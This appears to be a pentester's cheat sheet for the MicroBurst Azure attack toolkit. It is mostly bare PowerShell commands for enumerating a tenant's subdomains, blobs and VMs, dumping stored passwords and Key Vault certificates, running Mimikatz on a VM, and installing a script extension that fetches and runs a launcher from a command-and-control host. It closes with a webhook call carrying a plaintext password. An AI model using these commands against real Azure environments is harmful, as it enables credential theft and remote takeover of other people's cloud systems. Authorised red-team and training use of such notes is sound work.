MicroBurst

MicroBurst

Domain Enumeration (passive:

Subdomain enum:

Invoke-EnumerateAzureSubDomains -Base CLIENT -Verbose

Blob enum:

Invoke-EnumerateAzureBlobs -Base CLIENT -BingAPIKey 00000000001234567899876543210123

authenicate:

Connect-AzAccount

Credentials:

Gather Passwords:

Get-AzPasswords -Verbose

Cert:

Get-AzurePasswords -Keys N -AppServices N -Verbose

# Then execute the ps file: 
AuthenticateAs-XXXXX.ps1

Key Vaults:

Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize

Virtual machines:

Enum:

Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

VM Extensions:

Get-AzureVMExtensionSettings
Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv

run commands:

Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript

# mimikatz?
Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1

# Script extension (gather info from Get-AzureVMExtensionSettings):
Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
# Cleanup 
Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtension

Triggering a webhook:

$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" $AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}}) $body = ConvertTo-Json -InputObject $AccountInfo $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body